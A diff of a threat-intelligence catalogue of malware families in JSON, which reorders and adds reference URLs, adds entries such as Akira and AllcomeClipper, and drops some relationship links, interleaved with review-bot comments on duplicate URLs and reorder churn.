+ "https://mrt4ntr4.github.io/How-Analysing-an-AgentTesla-Could-Lead-To-Attackers-Inbox-1/",
+ "https://unit42.paloaltonetworks.com/originlogger/",
+ "https://malwarebreakdown.com/2018/01/11/malspam-entitled-invoice-attched-for-your-reference-delivers-agent-tesla-keylogger/",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ipfs-a-new-data-frontier-or-a-new-cybercriminal-hideout",
+ "https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/",
"https://mp.weixin.qq.com/s/X0kAIHOSldiFDthb4IsmbQ",
- "https://cofense.com/strategic-analysis-agent-tesla-expands-targeting-and-networking-capabilities/",
+ "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/",
+ "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
+ "https://youtu.be/BM38OshcozE",
+ "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf",
+ "https://blog.qualys.com/vulnerabilities-threat-research/2022/02/02/catching-the-rat-called-agent-tesla",
+ "https://forensicitguy.github.io/agenttesla-rtf-dotnet-tradecraft/",
"https://guillaumeorlando.github.io/GorgonInfectionchain",
- "https://malwr-analysis.com/2020/04/05/trojan-agent-tesla-malware-analysis/",
- "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/"
+ "https://isc.sans.edu/diary/28202",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
+ "https://malgamy.github.io/malware-analysis/Deep-Analysis-Agent-Tesla/",
+ "https://isc.sans.edu/diary/27666",
+ "https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/",
+ "https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf",
+ "https://mrt4ntr4.github.io/How-Analysing-an-AgentTesla-Could-Lead-To-Attackers-Inbox-2/",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
+ "https://yoroi.company/research/the-wayback-campaign-a-large-scale-operation-hiding-in-plain-sight/",
+ "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html",
+ "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/",
+ "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire",
+ "https://malwatch.github.io/posts/agent-tesla-malware-analysis/",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/",
+ "https://blog.minerva-labs.com/preventing-agenttesla",
+ "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader",
+ "https://cert.gov.ua/article/861292",
+ "https://www.vmray.com/cyber-security-blog/threat-bulletin-agent-tesla/"
],
"synonyms": [
"AgenTesla",
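Review bot: the rewritten `refs` list keeps near-duplicate URLs that differ only cosmetically: `https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord?` beside the same URL without the trailing `?`, and `http://www.secureworks.com/research/threat-profiles/gold-galleon` beside the `https://` form. Suggest normalising in the import step (strip a bare trailing `?`, prefer `https://`) so only one copy survives. Separately, the full reorder of an otherwise mostly unchanged list makes it hard to see the handful of real additions and removals; a stable (for example alphabetical) sort in the generator would keep future diffs reviewable.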
@@ -11714,15 +12408,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "f8cd62cb-b9d3-4352-8f46-0961cfde104c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "b88e29cf-79d9-42bc-b369-0383b5e04380",
"value": "Agent Tesla"
},
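Review bot: the `related` block linking Agent Tesla to `f8cd62cb-b9d3-4352-8f46-0961cfde104c` (`"type": "similar"`, tagged `estimative-language:likelihood-probability=\"almost-certain\"`) is removed outright, so any consumer that pivots from this cluster to that UUID loses the link. Unless the relationship is now expressed on the other entry or in a separate relationships file, it should be kept, or the commit message should state that the removal is intentional. The same removal appears further down for Alma Communicator and Anel.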
@@ -11752,14 +12437,27 @@
"uuid": "549b23b1-6f53-494e-a302-1d00aa71043b",
"value": "Ahtapot"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.akira",
+ "https://news.sophos.com/en-us/2023/05/09/akira-ransomware-is-bringin-88-back/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "834635f7-fb0f-472c-913e-fb112ae29fdc",
+ "value": "Akira"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.albaniiutas",
- "https://insight-jp.nttsecurity.com/post/102gkfp/pandas-new-arsenal-part-2-albaniiutas",
- "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/",
"https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia",
+ "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/",
+ "https://insight-jp.nttsecurity.com/post/102gkfp/pandas-new-arsenal-part-2-albaniiutas",
"https://blog.group-ib.com/task"
],
"synonyms": [
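Review bot: the albaniiutas reference list now carries the same Avast article twice, once without and once with a trailing slash (`"https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia"` next to the re-added `".../apt-group-targeting-governmental-agencies-in-east-asia/"`); the generator should normalise trailing slashes before deduplicating URLs. In the same hunk the new Akira entry has an empty `"description"` even though a Sophos write-up is cited; if descriptions are only imported from Malpedia that is consistent with the rest of the file, otherwise a one-line summary would help.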
@@ -11801,10 +12499,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.alice_atm",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/alice-lightweight-compact-no-nonsense-atm-malware/",
- "https://www.symantec.com/security-center/writeup/2016-122104-0203-99",
"https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf",
- "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html"
+ "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/alice-lightweight-compact-no-nonsense-atm-malware/",
+ "https://www.symantec.com/security-center/writeup/2016-122104-0203-99"
],
"synonyms": [
"AliceATM",
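Review bot: this hunk changes nothing but the order of the four existing URLs (the three removed lines are re-added verbatim lower in the list), which is pure churn; the same reorder-only pattern appears in the alphanc, alureon, amtsol, anatova and anchormail hunks below. Emitting `refs` in a deterministic order (sorted, or in the upstream order) would keep these diffs reviewable and let real additions and removals stand out.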
@@ -11820,14 +12518,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.alina_pos",
- "http://www.xylibox.com/2013/02/alina-34-pos-malware.html",
- "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-2/",
"https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-1/",
+ "http://www.xylibox.com/2013/02/alina-34-pos-malware.html",
"https://blog.centurylink.com/alina-point-of-sale-malware-still-lurking-in-dns/",
- "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina-POS-malware--sparks--off-a-new-variant/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/",
"https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Casting-a-Shadow-on-POS/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/two-new-pos-malware-affecting-us-smbs/"
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/two-new-pos-malware-affecting-us-smbs/",
+ "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-2/",
+ "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina-POS-malware--sparks--off-a-new-variant/"
],
"synonyms": [
"alina_eagle",
@@ -11844,15 +12542,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.allakore",
+ "https://sebdraven.medium.com/copy-cat-of-apt-sidewinder-1893059ca68d",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf",
+ "https://www.seqrite.com/documents/en/white-papers/Seqrite-WhitePaper-Operation-SideCopy.pdf",
+ "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
"https://twitter.com/_re_fox/status/1212070711206064131",
"https://github.com/Anderson-D/AllaKore",
"https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388",
- "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479",
+ "https://www.team-cymru.com/post/allakore-d-the-sidecopy-train",
"https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/592/original/Hashes_IOCs_for_coverage.txt",
- "https://www.seqrite.com/documents/en/white-papers/Seqrite-WhitePaper-Operation-SideCopy.pdf",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf",
- "https://blog.talosintelligence.com/2021/07/sidecopy.html"
+ "https://blog.talosintelligence.com/2021/07/sidecopy.html",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479"
],
"synonyms": [],
"type": []
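Review bot: the AllaKore references now list the Talos SideCopy PDF twice, differing only by the cache-busting query string (`".../062521_SideCopy_%281%29.pdf"` alongside `".../062521_SideCopy_%281%29.pdf?1625657388"`), and the `Network_IOCs_list_for_coverage.txt?1625657479` line is removed and re-added lower down without change. Stripping query strings before deduplication, or keeping a single canonical form, would avoid the duplicate.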
@@ -11876,6 +12576,20 @@
"uuid": "6aabb492-e282-40fb-a840-fe4e643ec094",
"value": "Allaple"
},
+ {
+ "description": "Allcome is classified as a clipper malware. Clippers are threats designed to access information saved in the clipboard (the temporary buffer space where copied data is stored) and substitute it with another. This attack is targeted at users who are active in the cryptocurrency sector mainly.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.allcomeclipper",
+ "https://www.gdatasoftware.com/blog/2022/02/37239-allcome-clipbanker-is-a-newcomer-in-malware-underground-forums",
+ "https://bazaar.abuse.ch/browse/signature/AllcomeClipper/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "43ca1245-a5e0-4b44-9892-cf317170c7b8",
+ "value": "AllcomeClipper"
+ },
{
"description": "",
"meta": {
@@ -11900,15 +12614,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "45de0d28-5a20-4190-ae21-68067e36e316",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "a0881a0c-e677-495b-b475-290af09bb716",
"value": "Alma Communicator"
},
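Review bot: another `related` link is dropped here (dest `45de0d28-5a20-4190-ae21-68067e36e316`, `similar`, almost-certain) with no replacement; same concern as for the Agent Tesla hunk above, a cross-galaxy relationship should not disappear silently.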
@@ -11951,7 +12656,7 @@
"value": "ALPC Local PrivEsc"
},
{
- "description": "",
+ "description": "The Alphabet ransomware is a new screenlocker that is currently being developed by a criminal developer. As the malware is not ready it does not affect any user files.\r\n\r\nThe virus includes a screenlocking function which locks the user’s screen and prohibits any interaction with the computer.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.alphabet_ransomware",
@@ -11981,8 +12686,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.alphanc",
- "https://www.secureworks.com/research/threat-profiles/nickel-gladstone",
- "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group"
+ "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group",
+ "https://www.secureworks.com/research/threat-profiles/nickel-gladstone"
],
"synonyms": [],
"type": []
@@ -12008,13 +12713,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.alureon",
- "https://archive.f-secure.com/weblog/archives/The_Case_of__TDL3.pdf",
"http://contagiodump.blogspot.com/2011/02/tdss-tdl-4-alureon-32-bit-and-64-bit.html",
- "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj64_wowlik.vt",
"http://contagiodump.blogspot.com/2010/02/list-of-aurora-hydraq-roarur-files.html",
+ "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj64_wowlik.vt",
+ "https://archive.f-secure.com/weblog/archives/The_Case_of__TDL3.pdf",
+ "https://www.johannesbader.ch/2016/01/the-dga-in-alureon-dnschanger/",
"http://contagiodump.blogspot.com/2012/02/purple-haze-bootkit.html",
"https://www.youtube.com/watch?v=FttiysUZmDw",
- "https://www.johannesbader.ch/2016/01/the-dga-in-alureon-dnschanger/",
"https://www.virusbulletin.com/virusbulletin/2016/01/paper-notes-click-fraud-american-story/"
],
"synonyms": [
@@ -12030,31 +12735,42 @@
"value": "Alureon"
},
{
- "description": "Amadey is a botnet that appeared around October 2018 and is being sold for about 500$ on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called \"tasks\") for all or specifically targeted computers compromised by the malware.",
+ "description": "Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called \"tasks\") for all or specifically targeted computers compromised by the malware.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey",
- "https://twitter.com/0xffff0800/status/1062948406266642432",
- "https://www.anquanke.com/post/id/230116",
- "https://nao-sec.org/2019/04/Analyzing-amadey.html",
- "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware",
- "https://twitter.com/ViriBack/status/1062405363457118210",
- "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
- "https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-decrypt-strings-in-amadey-1-09/",
- "https://blogs.blackberry.com/en/2020/01/threat-spotlight-amadey-bot",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- "https://blog.minerva-labs.com/underminer-exploit-kit-the-more-you-check-the-more-evasive-you-become",
- "https://krabsonsecurity.com/2019/02/13/analyzing-amadey-a-simple-native-malware/",
- "https://medium.com/walmartglobaltech/amadey-stealer-plugin-adds-mikrotik-and-outlook-harvesting-518efe724ce4",
- "https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html",
- "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672",
+ "https://blogs.blackberry.com/en/2022/07/smokeloader-malware-used-to-augment-amadey-infostealer",
"https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
"https://isc.sans.edu/diary/27264",
- "https://blogs.blackberry.com/en/2022/07/smokeloader-malware-used-to-augment-amadey-infostealer"
+ "https://blog.minerva-labs.com/underminer-exploit-kit-the-more-you-check-the-more-evasive-you-become",
+ "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html",
+ "https://asec.ahnlab.com/en/41450/",
+ "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672",
+ "https://twitter.com/0xffff0800/status/1062948406266642432",
+ "https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore",
+ "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do",
+ "https://www.anquanke.com/post/id/230116",
+ "https://embee-research.ghost.io/redline-stealer-basic-static-analysis-and-c2-extraction/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
+ "https://krabsonsecurity.com/2019/02/13/analyzing-amadey-a-simple-native-malware/",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
+ "https://thecyberexpress.com/amadey-botnet-back-via-phishing-sites/",
+ "https://twitter.com/ViriBack/status/1062405363457118210",
+ "https://blogs.blackberry.com/en/2020/01/threat-spotlight-amadey-bot",
+ "https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-decrypt-strings-in-amadey-1-09/",
+ "https://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://medium.com/walmartglobaltech/amadey-stealer-plugin-adds-mikrotik-and-outlook-harvesting-518efe724ce4",
+ "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware",
+ "https://nao-sec.org/2019/04/Analyzing-amadey.html",
+ "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://asec.ahnlab.com/en/36634/",
+ "https://blog.cyble.com/2023/01/25/the-rise-of-amadey-bot-a-growing-concern-for-internet-security/",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://asec.ahnlab.com/en/44504/"
],
"synonyms": [],
"type": []
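Review bot: the description fix from `500$` to `$500` is correct, but several of the new references are not about Amadey: `"https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html"` and `".../2022/04/20/malware-pers-1.html"` are generic technique tutorials (the first is also added to the Anchor hunk below, and the sibling `malware-pers-4.html` to both Anchor and AppleJeus), and `".../redline-stealer-basic-static-analysis-and-c2-extraction/"` is titled as a RedLine analysis. If these come through from upstream tagging they can stay, but it is worth checking that the generator is not collecting every URL that merely mentions the family.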
@@ -12067,8 +12783,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.amtsol",
- "http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf",
- "https://blogs.technet.microsoft.com/mmpc/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/"
+ "https://blogs.technet.microsoft.com/mmpc/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/",
+ "http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf"
],
"synonyms": [
"Adupihan"
@@ -12083,8 +12799,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.anatova_ransom",
- "https://www.bleepingcomputer.com/news/security/new-anatova-ransomware-supports-modules-for-extra-functionality/",
- "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/happy-new-year-2019-anatova-is-here/"
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/happy-new-year-2019-anatova-is-here/",
+ "https://www.bleepingcomputer.com/news/security/new-anatova-ransomware-supports-modules-for-extra-functionality/"
],
"synonyms": [],
"type": []
@@ -12097,24 +12813,26 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.anchor",
- "https://unit42.paloaltonetworks.com/ryuk-ransomware/",
- "https://isc.sans.edu/diary/27308",
- "https://hello.global.ntt/zh-cn/insights/blog/trickbot-variant-communicating-over-dns",
"https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware",
- "https://medium.com/walmartglobaltech/anchor-and-lazarus-together-again-24744e516607",
- "https://labs.sentinelone.com/the-deadly-planeswalker-how-the-trickbot-group-united-high-tech-crimeware-apt/",
- "https://technical.nttsecurity.com/post/102fsp2/trickbot-variant-anchor-dns-communicating-over-dns",
- "https://www.kryptoslogic.com/blog/2021/07/adjusting-the-anchor/",
- "https://www.netscout.com/blog/asert/dropping-anchor",
- "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf",
+ "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html",
+ "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html",
"https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/",
+ "https://isc.sans.edu/diary/27308",
+ "https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-hidden-anchor-bot-nexus-operations/",
+ "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf",
+ "https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth",
+ "https://medium.com/walmartglobaltech/anchor-and-lazarus-together-again-24744e516607",
+ "https://unit42.paloaltonetworks.com/ryuk-ransomware/",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
"https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/",
- "https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth",
- "https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-hidden-anchor-bot-nexus-operations/"
+ "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/",
+ "https://hello.global.ntt/zh-cn/insights/blog/trickbot-variant-communicating-over-dns",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.kryptoslogic.com/blog/2021/07/adjusting-the-anchor/",
+ "https://www.netscout.com/blog/asert/dropping-anchor",
+ "https://technical.nttsecurity.com/post/102fsp2/trickbot-variant-anchor-dns-communicating-over-dns",
+ "https://labs.sentinelone.com/the-deadly-planeswalker-how-the-trickbot-group-united-high-tech-crimeware-apt/"
],
"synonyms": [],
"type": []
@@ -12127,10 +12845,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.anchormail",
- "https://cyware.com/news/trickbots-anchordns-is-now-upgraded-to-anchormail-a21f5490/",
- "https://securityintelligence.com/posts/new-malware-trickbot-anchordns-backdoor-upgrades-anchormail/",
"https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine",
- "https://blog.google/threat-analysis-group/initial-access-broker-repurposing-techniques-in-targeted-attacks-against-ukraine/"
+ "https://securityintelligence.com/posts/new-malware-trickbot-anchordns-backdoor-upgrades-anchormail/",
+ "https://blog.google/threat-analysis-group/initial-access-broker-repurposing-techniques-in-targeted-attacks-against-ukraine/",
+ "https://cyware.com/news/trickbots-anchordns-is-now-upgraded-to-anchormail-a21f5490/"
],
"synonyms": [],
"type": []
@@ -12138,30 +12856,46 @@
"uuid": "7792096a-7623-43a1-9a67-28dce0e4b39e",
"value": "AnchorMail"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.andardoor",
+ "https://asec.ahnlab.com/ko/47751/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "59a2437b-ae63-466a-9172-60d6610c3e19",
+ "value": "Andardoor"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.andromeda",
- "https://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis",
- "https://redcanary.com/blog/intelligence-insights-november-2021/",
- "https://eternal-todo.com/blog/andromeda-gamarue-loves-json",
- "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
"https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf",
- "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/",
- "https://blog.avast.com/andromeda-under-the-microscope",
- "https://www.virusbulletin.com/virusbulletin/2013/08/andromeda-2-7-features",
- "https://www.virusbulletin.com/virusbulletin/2018/02/review-evolution-andromeda-over-years-we-say-goodbye/",
- "http://www.0xebfe.net/blog/2013/03/30/fooled-by-andromeda/",
- "http://resources.infosecinstitute.com/andromeda-bot-analysis/",
- "http://resources.infosecinstitute.com/andromeda-bot-analysis-part-two/",
- "https://byte-atlas.blogspot.ch/2015/04/kf-andromeda-bruteforcing.html",
- "https://www.crowdstrike.com/blog/how-to-remediate-hidden-malware-real-time-response/",
- "https://www.europol.europa.eu/newsroom/news/andromeda-botnet-dismantled-in-international-cyber-operation",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
"https://blogs.technet.microsoft.com/mmpc/2017/12/04/microsoft-teams-up-with-law-enforcement-and-other-partners-to-disrupt-gamarue-andromeda/",
+ "https://byte-atlas.blogspot.ch/2015/04/kf-andromeda-bruteforcing.html",
+ "https://redcanary.com/blog/intelligence-insights-november-2021/",
+ "http://resources.infosecinstitute.com/andromeda-bot-analysis/",
+ "https://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis",
+ "https://www.mandiant.com/resources/blog/turla-galaxy-opportunity",
+ "https://blog.avast.com/andromeda-under-the-microscope",
+ "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
+ "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "https://www.trellix.com/en-us/about/newsroom/stories/research/cyberattacks-targeting-ukraine-increase.html",
+ "https://www.europol.europa.eu/newsroom/news/andromeda-botnet-dismantled-in-international-cyber-operation",
"http://blog.morphisec.com/andromeda-tactics-analyzed",
- "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf"
+ "https://www.virusbulletin.com/virusbulletin/2018/02/review-evolution-andromeda-over-years-we-say-goodbye/",
+ "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/",
+ "https://www.virusbulletin.com/virusbulletin/2013/08/andromeda-2-7-features",
+ "https://www.crowdstrike.com/blog/how-to-remediate-hidden-malware-real-time-response/",
+ "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf",
+ "http://www.0xebfe.net/blog/2013/03/30/fooled-by-andromeda/",
+ "https://eternal-todo.com/blog/andromeda-gamarue-loves-json",
+ "http://resources.infosecinstitute.com/andromeda-bot-analysis-part-two/"
],
"synonyms": [
"B106-Gamarue",
@@ -12179,15 +12913,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.andromut",
- "https://www.proofpoint.com/us/threat-insight/post/ta505-begins-summer-campaigns-new-pet-malware-downloader-andromut-uae-south",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://intel471.com/blog/a-brief-history-of-ta505",
"https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
"https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part3/",
"https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/",
+ "https://www.proofpoint.com/us/threat-insight/post/ta505-begins-summer-campaigns-new-pet-malware-downloader-andromut-uae-south",
"https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
- "https://intel471.com/blog/a-brief-history-of-ta505",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
